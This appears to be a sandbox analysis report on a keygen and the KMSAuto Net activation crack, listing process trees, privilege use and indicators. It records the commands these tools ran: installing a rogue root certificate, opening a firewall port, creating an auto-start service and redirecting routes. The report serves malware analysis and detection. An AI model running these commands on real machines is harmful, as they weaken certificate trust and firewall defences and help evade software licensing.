Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\648384A4DEE53D4C1C87E10D67CC99307CCC9C98	certmgr.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\6C0CE2DD0584C47CAC18839F14055F19FA270CDD	Setup.exe

Runs net.exe
Runs ping.exe 1 TTPs 7 IoCs

Remote System Discovery
T1018

Processes:

PING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXE

pid process

4920 PING.EXE
5716 PING.EXE
6224 PING.EXE
2244 PING.EXE
4432 PING.EXE
4164 PING.EXE
4924 PING.EXE

pid	process
4920	PING.EXE
5716	PING.EXE
6224	PING.EXE
2244	PING.EXE
4432	PING.EXE
4164	PING.EXE
4924	PING.EXE

Script User-Agent 5 IoCs

Uses user-agent string associated with script host/environment.

Processes:

description	flow	ioc
HTTP User-Agent header	122	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	127	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	201	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	217	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	274	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious behavior: EnumeratesProcesses 19 IoCs

Processes:

KMSAuto Net.exeSppExtComObjPatcher.exekey.exe

pid	process
1052	KMSAuto Net.exe
1052	KMSAuto Net.exe
1052	KMSAuto Net.exe
1052	KMSAuto Net.exe
1052	KMSAuto Net.exe
1052	KMSAuto Net.exe
1052	KMSAuto Net.exe
1052	KMSAuto Net.exe
1052	KMSAuto Net.exe
1052	KMSAuto Net.exe
1052	KMSAuto Net.exe
3792	SppExtComObjPatcher.exe
3792	SppExtComObjPatcher.exe
3792	SppExtComObjPatcher.exe
3792	SppExtComObjPatcher.exe
3792	SppExtComObjPatcher.exe
3792	SppExtComObjPatcher.exe
2380	key.exe
2380	key.exe

Suspicious behavior: LoadsDriver 8 IoCs

Processes:

pid process

620
620
620
620
620
620
620
620

pid	process
620
620
620
620
620
620
620
620

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

AUDIODG.EXENETSTAT.EXEKMSAuto Net.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exeNETSTAT.EXEtaskkill.exetaskkill.exemsiexec.exemsiexec.exe

description	pid	process
Token: 33	1824	AUDIODG.EXE
Token: SeIncBasePriorityPrivilege	1824	AUDIODG.EXE
Token: SeDebugPrivilege	4076	NETSTAT.EXE
Token: SeDebugPrivilege	1052	KMSAuto Net.exe
Token: SeDebugPrivilege	1020	taskkill.exe
Token: SeDebugPrivilege	4040	taskkill.exe
Token: SeDebugPrivilege	1188	taskkill.exe
Token: SeDebugPrivilege	3796	taskkill.exe
Token: SeDebugPrivilege	1400	taskkill.exe
Token: SeDebugPrivilege	3972	taskkill.exe
Token: SeDebugPrivilege	3976	taskkill.exe
Token: SeDebugPrivilege	1256	taskkill.exe
Token: SeDebugPrivilege	2288	taskkill.exe
Token: SeDebugPrivilege	3684	taskkill.exe
Token: SeDebugPrivilege	1136	taskkill.exe
Token: SeDebugPrivilege	2440	NETSTAT.EXE
Token: SeDebugPrivilege	1500	taskkill.exe
Token: SeDebugPrivilege	3924	taskkill.exe
Token: SeShutdownPrivilege	2668	msiexec.exe
Token: SeIncreaseQuotaPrivilege	2668	msiexec.exe
Token: SeSecurityPrivilege	4104	msiexec.exe
Token: SeCreateTokenPrivilege	2668	msiexec.exe
Token: SeAssignPrimaryTokenPrivilege	2668	msiexec.exe
Token: SeLockMemoryPrivilege	2668	msiexec.exe
Token: SeIncreaseQuotaPrivilege	2668	msiexec.exe
Token: SeMachineAccountPrivilege	2668	msiexec.exe
Token: SeTcbPrivilege	2668	msiexec.exe
Token: SeSecurityPrivilege	2668	msiexec.exe
Token: SeTakeOwnershipPrivilege	2668	msiexec.exe
Token: SeLoadDriverPrivilege	2668	msiexec.exe
Token: SeSystemProfilePrivilege	2668	msiexec.exe
Token: SeSystemtimePrivilege	2668	msiexec.exe
Token: SeProfSingleProcessPrivilege	2668	msiexec.exe
Token: SeIncBasePriorityPrivilege	2668	msiexec.exe
Token: SeCreatePagefilePrivilege	2668	msiexec.exe
Token: SeCreatePermanentPrivilege	2668	msiexec.exe
Token: SeBackupPrivilege	2668	msiexec.exe
Token: SeRestorePrivilege	2668	msiexec.exe
Token: SeShutdownPrivilege	2668	msiexec.exe
Token: SeDebugPrivilege	2668	msiexec.exe
Token: SeAuditPrivilege	2668	msiexec.exe
Token: SeSystemEnvironmentPrivilege	2668	msiexec.exe
Token: SeChangeNotifyPrivilege	2668	msiexec.exe
Token: SeRemoteShutdownPrivilege	2668	msiexec.exe
Token: SeUndockPrivilege	2668	msiexec.exe
Token: SeSyncAgentPrivilege	2668	msiexec.exe
Token: SeEnableDelegationPrivilege	2668	msiexec.exe
Token: SeManageVolumePrivilege	2668	msiexec.exe
Token: SeImpersonatePrivilege	2668	msiexec.exe
Token: SeCreateGlobalPrivilege	2668	msiexec.exe
Token: SeCreateTokenPrivilege	2668	msiexec.exe
Token: SeAssignPrimaryTokenPrivilege	2668	msiexec.exe
Token: SeLockMemoryPrivilege	2668	msiexec.exe
Token: SeIncreaseQuotaPrivilege	2668	msiexec.exe
Token: SeMachineAccountPrivilege	2668	msiexec.exe
Token: SeTcbPrivilege	2668	msiexec.exe
Token: SeSecurityPrivilege	2668	msiexec.exe
Token: SeTakeOwnershipPrivilege	2668	msiexec.exe
Token: SeLoadDriverPrivilege	2668	msiexec.exe
Token: SeSystemProfilePrivilege	2668	msiexec.exe
Token: SeSystemtimePrivilege	2668	msiexec.exe
Token: SeProfSingleProcessPrivilege	2668	msiexec.exe
Token: SeIncBasePriorityPrivilege	2668	msiexec.exe
Token: SeCreatePagefilePrivilege	2668	msiexec.exe

Suspicious use of FindShellTrayWindow 2 IoCs

Processes:

msiexec.exe

pid process

2668 msiexec.exe
2668 msiexec.exe

pid	process
2668	msiexec.exe
2668	msiexec.exe

Suspicious use of SetWindowsHookEx 25 IoCs

Processes:

Stellar.Phoenix.Data.Recovery.serial.keygen.by.orion.exewzt.datcertmgr.execertmgr.exebin.datAESDecoder.exebin_x64.datbin_x64.datbin_x64.datbin_x64.datbin_x64.datbin_x64.datbin_x64.datbin_x64.datbin_x64.datbin_x64.datbin_x64.datwzt.datcertmgr.execertmgr.exebin.datAESDecoder.exebin_x64.datSppPatcher_x64.dat

pid	process
3912	Stellar.Phoenix.Data.Recovery.serial.keygen.by.orion.exe
3912	Stellar.Phoenix.Data.Recovery.serial.keygen.by.orion.exe
2600	wzt.dat
2588	certmgr.exe
984	certmgr.exe
2364	bin.dat
2608	AESDecoder.exe
3980	bin_x64.dat
3916	bin_x64.dat
2448	bin_x64.dat
1324	bin_x64.dat
1596	bin_x64.dat
428	bin_x64.dat
516	bin_x64.dat
812	bin_x64.dat
3168	bin_x64.dat
2912	bin_x64.dat
2328	bin_x64.dat
2100	wzt.dat
804	certmgr.exe
1628	certmgr.exe
3808	bin.dat
896	AESDecoder.exe
936	bin_x64.dat
1680	SppPatcher_x64.dat

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

KMSAuto Net.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.exe

description	pid	process	target process
PID 1052 wrote to memory of 3812	1052	KMSAuto Net.exe	cmd.exe
PID 1052 wrote to memory of 3812	1052	KMSAuto Net.exe	cmd.exe
PID 1052 wrote to memory of 3812	1052	KMSAuto Net.exe	cmd.exe
PID 1052 wrote to memory of 1356	1052	KMSAuto Net.exe	cmd.exe
PID 1052 wrote to memory of 1356	1052	KMSAuto Net.exe	cmd.exe
PID 1052 wrote to memory of 3724	1052	KMSAuto Net.exe	cmd.exe
PID 1052 wrote to memory of 3724	1052	KMSAuto Net.exe	cmd.exe
PID 1052 wrote to memory of 2356	1052	KMSAuto Net.exe	cmd.exe
PID 1052 wrote to memory of 2356	1052	KMSAuto Net.exe	cmd.exe
PID 1052 wrote to memory of 480	1052	KMSAuto Net.exe	cmd.exe
PID 1052 wrote to memory of 480	1052	KMSAuto Net.exe	cmd.exe
PID 480 wrote to memory of 2600	480	cmd.exe	wzt.dat
PID 480 wrote to memory of 2600	480	cmd.exe	wzt.dat
PID 480 wrote to memory of 2600	480	cmd.exe	wzt.dat
PID 1052 wrote to memory of 2168	1052	KMSAuto Net.exe	cmd.exe
PID 1052 wrote to memory of 2168	1052	KMSAuto Net.exe	cmd.exe
PID 1052 wrote to memory of 932	1052	KMSAuto Net.exe	cmd.exe
PID 1052 wrote to memory of 932	1052	KMSAuto Net.exe	cmd.exe
PID 932 wrote to memory of 2588	932	cmd.exe	certmgr.exe
PID 932 wrote to memory of 2588	932	cmd.exe	certmgr.exe
PID 932 wrote to memory of 2588	932	cmd.exe	certmgr.exe
PID 1052 wrote to memory of 1576	1052	KMSAuto Net.exe	cmd.exe
PID 1052 wrote to memory of 1576	1052	KMSAuto Net.exe	cmd.exe
PID 1576 wrote to memory of 984	1576	cmd.exe	certmgr.exe
PID 1576 wrote to memory of 984	1576	cmd.exe	certmgr.exe
PID 1576 wrote to memory of 984	1576	cmd.exe	certmgr.exe
PID 1052 wrote to memory of 1324	1052	KMSAuto Net.exe	cmd.exe
PID 1052 wrote to memory of 1324	1052	KMSAuto Net.exe	cmd.exe
PID 1052 wrote to memory of 3620	1052	KMSAuto Net.exe	cmd.exe
PID 1052 wrote to memory of 3620	1052	KMSAuto Net.exe	cmd.exe
PID 3620 wrote to memory of 2364	3620	cmd.exe	bin.dat
PID 3620 wrote to memory of 2364	3620	cmd.exe	bin.dat
PID 3620 wrote to memory of 2364	3620	cmd.exe	bin.dat
PID 1052 wrote to memory of 3900	1052	KMSAuto Net.exe	cmd.exe
PID 1052 wrote to memory of 3900	1052	KMSAuto Net.exe	cmd.exe
PID 1052 wrote to memory of 2092	1052	KMSAuto Net.exe	cmd.exe
PID 1052 wrote to memory of 2092	1052	KMSAuto Net.exe	cmd.exe
PID 2092 wrote to memory of 2608	2092	cmd.exe	AESDecoder.exe
PID 2092 wrote to memory of 2608	2092	cmd.exe	AESDecoder.exe
PID 2092 wrote to memory of 2608	2092	cmd.exe	AESDecoder.exe
PID 1052 wrote to memory of 3140	1052	KMSAuto Net.exe	cmd.exe
PID 1052 wrote to memory of 3140	1052	KMSAuto Net.exe	cmd.exe
PID 1052 wrote to memory of 3924	1052	KMSAuto Net.exe	cmd.exe
PID 1052 wrote to memory of 3924	1052	KMSAuto Net.exe	cmd.exe
PID 3924 wrote to memory of 3980	3924	cmd.exe	bin_x64.dat
PID 3924 wrote to memory of 3980	3924	cmd.exe	bin_x64.dat
PID 3924 wrote to memory of 3980	3924	cmd.exe	bin_x64.dat
PID 1052 wrote to memory of 1952	1052	KMSAuto Net.exe	cmd.exe
PID 1052 wrote to memory of 1952	1052	KMSAuto Net.exe	cmd.exe
PID 1052 wrote to memory of 1568	1052	KMSAuto Net.exe	cmd.exe
PID 1052 wrote to memory of 1568	1052	KMSAuto Net.exe	cmd.exe
PID 1568 wrote to memory of 1336	1568	cmd.exe	cmd.exe
PID 1568 wrote to memory of 1336	1568	cmd.exe	cmd.exe
PID 1336 wrote to memory of 4076	1336	cmd.exe	NETSTAT.EXE
PID 1336 wrote to memory of 4076	1336	cmd.exe	NETSTAT.EXE
PID 1336 wrote to memory of 2912	1336	cmd.exe	find.exe
PID 1336 wrote to memory of 2912	1336	cmd.exe	find.exe
PID 1052 wrote to memory of 3168	1052	KMSAuto Net.exe	Netsh.exe
PID 1052 wrote to memory of 3168	1052	KMSAuto Net.exe	Netsh.exe
PID 1052 wrote to memory of 772	1052	KMSAuto Net.exe	Netsh.exe
PID 1052 wrote to memory of 772	1052	KMSAuto Net.exe	Netsh.exe
PID 1052 wrote to memory of 2092	1052	KMSAuto Net.exe	sc.exe
PID 1052 wrote to memory of 2092	1052	KMSAuto Net.exe	sc.exe
PID 1052 wrote to memory of 2092	1052	KMSAuto Net.exe	sc.exe

C:\Users\Admin\AppData\Local\Temp\Stellar.Phoenix.Data.Recovery.serial.keygen.by.orion.exe
"C:\Users\Admin\AppData\Local\Temp\Stellar.Phoenix.Data.Recovery.serial.keygen.by.orion.exe"
1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:3912

C:\Users\Admin\Desktop\KMSAuto Net.exe
"C:\Users\Admin\Desktop\KMSAuto Net.exe"
1⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1052

C:\Windows\SysWOW64\cmd.exe
cmd /c md "C:\Users\Admin\AppData\Local\MSfree Inc"
2⤵
PID:3812

C:\Windows\System32\cmd.exe
C:\Windows\Sysnative\cmd.exe /c echo test>>"C:\Users\Admin\Desktop\test.test"
2⤵
PID:1356

C:\Windows\System32\cmd.exe
C:\Windows\Sysnative\cmd.exe /D /c del /F /Q "test.test"
2⤵
PID:3724

C:\Windows\System32\cmd.exe
C:\Windows\Sysnative\cmd.exe /D /c md "C:\ProgramData\KMSAuto"
2⤵
PID:2356

C:\Windows\System32\cmd.exe
C:\Windows\Sysnative\cmd.exe /D /c wzt.dat -y -pkmsauto
2⤵
- Suspicious use of WriteProcessMemory
PID:480

C:\ProgramData\KMSAuto\wzt.dat
wzt.dat -y -pkmsauto
3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:2600

C:\Windows\System32\cmd.exe
C:\Windows\Sysnative\cmd.exe /D /c del /F /Q "wzt.dat"
2⤵
PID:2168

C:\Windows\System32\cmd.exe
C:\Windows\Sysnative\cmd.exe /D /c certmgr.exe -add wzteam.cer -n wzteam -s -r localMachine ROOT
2⤵
- Suspicious use of WriteProcessMemory
PID:932

C:\ProgramData\KMSAuto\wzt\certmgr.exe
certmgr.exe -add wzteam.cer -n wzteam -s -r localMachine ROOT
3⤵
- Executes dropped EXE
- Modifies system certificate store
- Suspicious use of SetWindowsHookEx
PID:2588

C:\Windows\System32\cmd.exe
C:\Windows\Sysnative\cmd.exe /D /c certmgr.exe -add wzteam.cer -n wzteam -s -r localMachine TRUSTEDPUBLISHER
2⤵
- Suspicious use of WriteProcessMemory
PID:1576

C:\ProgramData\KMSAuto\wzt\certmgr.exe
certmgr.exe -add wzteam.cer -n wzteam -s -r localMachine TRUSTEDPUBLISHER
3⤵
- Executes dropped EXE
- Modifies system certificate store
- Suspicious use of SetWindowsHookEx
PID:984

C:\Windows\System32\cmd.exe
"C:\Windows\Sysnative\cmd.exe" /c rd "C:\ProgramData\KMSAuto\wzt" /S /Q
2⤵
PID:1324

C:\Windows\System32\cmd.exe
C:\Windows\Sysnative\cmd.exe /D /c bin.dat -y -pkmsauto
2⤵
- Suspicious use of WriteProcessMemory
PID:3620

C:\ProgramData\KMSAuto\bin.dat
bin.dat -y -pkmsauto
3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:2364

C:\Windows\System32\cmd.exe
C:\Windows\Sysnative\cmd.exe /D /c del /F /Q "bin.dat"
2⤵
PID:3900

C:\Windows\System32\cmd.exe
C:\Windows\Sysnative\cmd.exe /D /c AESDecoder.exe
2⤵
- Suspicious use of WriteProcessMemory
PID:2092

C:\ProgramData\KMSAuto\bin\AESDecoder.exe
AESDecoder.exe
3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:2608

C:\Windows\System32\cmd.exe
C:\Windows\Sysnative\cmd.exe /D /c del /F /Q "AESDecoder.exe"
2⤵
PID:3140

C:\Windows\System32\cmd.exe
C:\Windows\Sysnative\cmd.exe /D /c bin_x64.dat -y -pkmsauto
2⤵
- Suspicious use of WriteProcessMemory
PID:3924

C:\ProgramData\KMSAuto\bin_x64.dat
bin_x64.dat -y -pkmsauto
3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:3980

C:\Windows\System32\cmd.exe
C:\Windows\Sysnative\cmd.exe /D /c del /F /Q "bin_x64.dat"
2⤵
PID:1952

C:\Windows\System32\cmd.exe
C:\Windows\Sysnative\cmd.exe /D /c for /f "tokens=5 delims=, " %i in ('netstat -ano ^| find ":1688 "') do taskkill /pid %i /f
2⤵
- Suspicious use of WriteProcessMemory
PID:1568

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c netstat -ano | find ":1688 "
3⤵
- Suspicious use of WriteProcessMemory
PID:1336

C:\Windows\system32\NETSTAT.EXE
netstat -ano
4⤵
- Gathers network information
- Suspicious use of AdjustPrivilegeToken
PID:4076

C:\Windows\system32\find.exe
find ":1688 "
4⤵
PID:2912

C:\Windows\System32\Netsh.exe
C:\Windows\Sysnative\Netsh Advfirewall Firewall delete rule name="0pen Port KMS" protocol=TCP
2⤵
PID:3168

C:\Windows\System32\Netsh.exe
C:\Windows\Sysnative\Netsh Advfirewall Firewall add rule name="0pen Port KMS" dir=in action=allow protocol=TCP localport=1688
2⤵
PID:772

C:\Windows\SysWOW64\sc.exe
"sc.exe" create KMSEmulator binpath= temp.exe type= own start= auto
2⤵
PID:2092

C:\Windows\SysWOW64\sc.exe
"sc.exe" start KMSEmulator
2⤵
PID:3140

C:\Windows\System32\cmd.exe
C:\Windows\Sysnative\cmd.exe /D /c bin_x64.dat -y -pkmsauto
2⤵
PID:1328

C:\ProgramData\KMSAuto\bin_x64.dat
bin_x64.dat -y -pkmsauto
3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:3916

C:\Windows\System32\cmd.exe
C:\Windows\Sysnative\cmd.exe /D /c del /F /Q "bin_x64.dat"
2⤵
PID:976

C:\Windows\System32\cmd.exe
C:\Windows\Sysnative\cmd.exe /D /c route -p add 100.100.0.10 0.0.0.0 IF 1
2⤵
PID:2352

C:\Windows\system32\ROUTE.EXE
route -p add 100.100.0.10 0.0.0.0 IF 1
3⤵
PID:3580

C:\Windows\System32\cmd.exe
C:\Windows\Sysnative\cmd.exe /D /c FakeClient.exe 100.100.0.10
2⤵
PID:636

C:\Windows\System32\cmd.exe
C:\Windows\Sysnative\cmd.exe /D /c route delete 100.100.0.10 0.0.0.0
2⤵
PID:480

C:\Windows\system32\ROUTE.EXE
route delete 100.100.0.10 0.0.0.0
3⤵
PID:2168

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c taskkill /t /f /IM FakeClient.exe
2⤵
PID:2676

C:\Windows\SysWOW64\taskkill.exe
taskkill /t /f /IM FakeClient.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1020

C:\Windows\SysWOW64\sc.exe
"sc.exe" stop WinDivert1.1
2⤵
PID:2640

C:\Windows\SysWOW64\sc.exe
"sc.exe" delete WinDivert1.1
2⤵
PID:976

C:\Windows\System32\cmd.exe
C:\Windows\Sysnative\cmd.exe /D /c bin_x64.dat -y -pkmsauto
2⤵
PID:3828

C:\ProgramData\KMSAuto\bin_x64.dat
bin_x64.dat -y -pkmsauto
3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:2448

C:\Windows\System32\cmd.exe
C:\Windows\Sysnative\cmd.exe /D /c del /F /Q "bin_x64.dat"
2⤵
PID:3960

C:\Windows\System32\cmd.exe
C:\Windows\Sysnative\cmd.exe /D /c route -p add 100.100.0.10 0.0.0.0 IF 1
2⤵
PID:480

C:\Windows\system32\ROUTE.EXE
route -p add 100.100.0.10 0.0.0.0 IF 1
3⤵
PID:3852

C:\Windows\System32\cmd.exe
C:\Windows\Sysnative\cmd.exe /D /c FakeClient.exe 100.100.0.10
2⤵
PID:3676

C:\ProgramData\KMSAuto\bin\driver\x64WDV\FakeClient.exe
FakeClient.exe 100.100.0.10
3⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Windows directory
PID:1136

C:\Windows\System32\cmd.exe
C:\Windows\Sysnative\cmd.exe /D /c route delete 100.100.0.10 0.0.0.0
2⤵
PID:2376

C:\Windows\system32\ROUTE.EXE
route delete 100.100.0.10 0.0.0.0
3⤵
PID:2816

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c taskkill /t /f /IM FakeClient.exe
2⤵
PID:2352

C:\Windows\SysWOW64\taskkill.exe
taskkill /t /f /IM FakeClient.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4040

C:\Windows\SysWOW64\sc.exe
"sc.exe" stop WinDivert1.1
2⤵
PID:3432

C:\Windows\SysWOW64\sc.exe
"sc.exe" delete WinDivert1.1
2⤵
PID:932

C:\Windows\System32\cmd.exe
C:\Windows\Sysnative\cmd.exe /D /c bin_x64.dat -y -pkmsauto
2⤵
PID:2288

C:\ProgramData\KMSAuto\bin_x64.dat
bin_x64.dat -y -pkmsauto
3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:1324

C:\Windows\System32\cmd.exe
C:\Windows\Sysnative\cmd.exe /D /c del /F /Q "bin_x64.dat"
2⤵
PID:580

C:\Windows\System32\cmd.exe
C:\Windows\Sysnative\cmd.exe /D /c route -p add 100.100.0.10 0.0.0.0 IF 1
2⤵
PID:504

C:\Windows\system32\ROUTE.EXE
route -p add 100.100.0.10 0.0.0.0 IF 1
3⤵
PID:3828

C:\Windows\System32\cmd.exe
C:\Windows\Sysnative\cmd.exe /D /c FakeClient.exe 100.100.0.10
2⤵
PID:2376

C:\ProgramData\KMSAuto\bin\driver\x64WDV\FakeClient.exe
FakeClient.exe 100.100.0.10
3⤵
- Executes dropped EXE
- Loads dropped DLL
PID:3960

C:\Windows\System32\cmd.exe
C:\Windows\Sysnative\cmd.exe /D /c route delete 100.100.0.10 0.0.0.0
2⤵
PID:2444

C:\Windows\system32\ROUTE.EXE
route delete 100.100.0.10 0.0.0.0
3⤵
PID:1952

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c taskkill /t /f /IM FakeClient.exe
2⤵
PID:3736

C:\Windows\SysWOW64\taskkill.exe
taskkill /t /f /IM FakeClient.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1188

C:\Windows\SysWOW64\sc.exe
"sc.exe" stop WinDivert1.1
2⤵
PID:584

C:\Windows\SysWOW64\sc.exe
"sc.exe" delete WinDivert1.1
2⤵
PID:3748

C:\Windows\System32\cmd.exe
C:\Windows\Sysnative\cmd.exe /D /c bin_x64.dat -y -pkmsauto
2⤵
PID:428

C:\ProgramData\KMSAuto\bin_x64.dat
bin_x64.dat -y -pkmsauto
3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:1596

C:\Windows\System32\cmd.exe
C:\Windows\Sysnative\cmd.exe /D /c del /F /Q "bin_x64.dat"
2⤵
PID:2356

C:\Windows\System32\cmd.exe
C:\Windows\Sysnative\cmd.exe /D /c route -p add 100.100.0.10 0.0.0.0 IF 1
2⤵
PID:3004

C:\Windows\system32\ROUTE.EXE
route -p add 100.100.0.10 0.0.0.0 IF 1
3⤵
PID:2816

C:\Windows\System32\cmd.exe
C:\Windows\Sysnative\cmd.exe /D /c FakeClient.exe 100.100.0.10
2⤵
PID:2128

C:\ProgramData\KMSAuto\bin\driver\x64WDV\FakeClient.exe
FakeClient.exe 100.100.0.10
3⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Windows directory
PID:3852

C:\Windows\System32\cmd.exe
C:\Windows\Sysnative\cmd.exe /D /c route delete 100.100.0.10 0.0.0.0
2⤵
PID:204

C:\Windows\system32\ROUTE.EXE
route delete 100.100.0.10 0.0.0.0
3⤵
PID:804

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c taskkill /t /f /IM FakeClient.exe
2⤵
PID:4072

C:\Windows\SysWOW64\taskkill.exe
taskkill /t /f /IM FakeClient.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3796

C:\Windows\SysWOW64\sc.exe
"sc.exe" stop WinDivert1.1
2⤵
PID:1204

C:\Windows\SysWOW64\sc.exe
"sc.exe" delete WinDivert1.1
2⤵
PID:2452

C:\Windows\System32\cmd.exe
C:\Windows\Sysnative\cmd.exe /D /c bin_x64.dat -y -pkmsauto
2⤵
PID:2808

C:\ProgramData\KMSAuto\bin_x64.dat
bin_x64.dat -y -pkmsauto
3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:428

C:\Windows\System32\cmd.exe
C:\Windows\Sysnative\cmd.exe /D /c del /F /Q "bin_x64.dat"
2⤵
PID:2164

C:\Windows\System32\cmd.exe
C:\Windows\Sysnative\cmd.exe /D /c route -p add 100.100.0.10 0.0.0.0 IF 1
2⤵
PID:2328

C:\Windows\system32\ROUTE.EXE
route -p add 100.100.0.10 0.0.0.0 IF 1
3⤵
PID:3960

C:\Windows\System32\cmd.exe
C:\Windows\Sysnative\cmd.exe /D /c FakeClient.exe 100.100.0.10
2⤵
PID:2424

C:\ProgramData\KMSAuto\bin\driver\x64WDV\FakeClient.exe
FakeClient.exe 100.100.0.10
3⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Windows directory
PID:2912

C:\Windows\System32\cmd.exe
C:\Windows\Sysnative\cmd.exe /D /c route delete 100.100.0.10 0.0.0.0
2⤵
PID:2028

C:\Windows\system32\ROUTE.EXE
route delete 100.100.0.10 0.0.0.0
3⤵
PID:1500

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c taskkill /t /f /IM FakeClient.exe
2⤵
PID:1348

C:\Windows\SysWOW64\taskkill.exe
taskkill /t /f /IM FakeClient.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1400

C:\Windows\SysWOW64\sc.exe
"sc.exe" stop WinDivert1.1
2⤵
PID:2456

C:\Windows\SysWOW64\sc.exe
"sc.exe" delete WinDivert1.1
2⤵
PID:636

C:\Windows\System32\cmd.exe
C:\Windows\Sysnative\cmd.exe /D /c bin_x64.dat -y -pkmsauto
2⤵
PID:1060

C:\ProgramData\KMSAuto\bin_x64.dat
bin_x64.dat -y -pkmsauto
3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:516

C:\Windows\System32\cmd.exe
C:\Windows\Sysnative\cmd.exe /D /c del /F /Q "bin_x64.dat"
2⤵
PID:2208

C:\Windows\System32\cmd.exe
C:\Windows\Sysnative\cmd.exe /D /c route -p add 100.100.0.10 0.0.0.0 IF 1
2⤵
PID:2464

C:\Windows\system32\ROUTE.EXE
route -p add 100.100.0.10 0.0.0.0 IF 1
3⤵
PID:1732

C:\Windows\System32\cmd.exe
C:\Windows\Sysnative\cmd.exe /D /c FakeClient.exe 100.100.0.10
2⤵
PID:480

C:\ProgramData\KMSAuto\bin\driver\x64WDV\FakeClient.exe
FakeClient.exe 100.100.0.10
3⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Windows directory
PID:2240

C:\Windows\System32\cmd.exe
C:\Windows\Sysnative\cmd.exe /D /c route delete 100.100.0.10 0.0.0.0
2⤵
PID:804

C:\Windows\system32\ROUTE.EXE
route delete 100.100.0.10 0.0.0.0
3⤵
PID:2444

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c taskkill /t /f /IM FakeClient.exe
2⤵
PID:3620

C:\Windows\SysWOW64\taskkill.exe
taskkill /t /f /IM FakeClient.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3972

C:\Windows\SysWOW64\sc.exe
"sc.exe" stop WinDivert1.1
2⤵
PID:1568

C:\Windows\SysWOW64\sc.exe
"sc.exe" delete WinDivert1.1
2⤵
PID:3992

C:\Windows\System32\cmd.exe
C:\Windows\Sysnative\cmd.exe /D /c bin_x64.dat -y -pkmsauto
2⤵
PID:1632

C:\ProgramData\KMSAuto\bin_x64.dat
bin_x64.dat -y -pkmsauto
3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:812

C:\Windows\System32\cmd.exe
C:\Windows\Sysnative\cmd.exe /D /c del /F /Q "bin_x64.dat"
2⤵
PID:2208

C:\Windows\System32\cmd.exe
C:\Windows\Sysnative\cmd.exe /D /c route -p add 100.100.0.10 0.0.0.0 IF 1
2⤵
PID:1732

C:\Windows\system32\ROUTE.EXE
route -p add 100.100.0.10 0.0.0.0 IF 1
3⤵
PID:2932

C:\Windows\System32\cmd.exe
C:\Windows\Sysnative\cmd.exe /D /c FakeClient.exe 100.100.0.10
2⤵
PID:2240

C:\ProgramData\KMSAuto\bin\driver\x64WDV\FakeClient.exe
FakeClient.exe 100.100.0.10
3⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Windows directory
PID:4036

C:\Windows\System32\cmd.exe
C:\Windows\Sysnative\cmd.exe /D /c route delete 100.100.0.10 0.0.0.0
2⤵
PID:204

C:\Windows\system32\ROUTE.EXE
route delete 100.100.0.10 0.0.0.0
3⤵
PID:1500

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c taskkill /t /f /IM FakeClient.exe
2⤵
PID:4064

C:\Windows\SysWOW64\taskkill.exe
taskkill /t /f /IM FakeClient.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3976

C:\Windows\SysWOW64\sc.exe
"sc.exe" stop WinDivert1.1
2⤵
PID:580

C:\Windows\SysWOW64\sc.exe
"sc.exe" delete WinDivert1.1
2⤵
PID:3636

C:\Windows\System32\cmd.exe
C:\Windows\Sysnative\cmd.exe /D /c bin_x64.dat -y -pkmsauto
2⤵
PID:1244

C:\ProgramData\KMSAuto\bin_x64.dat
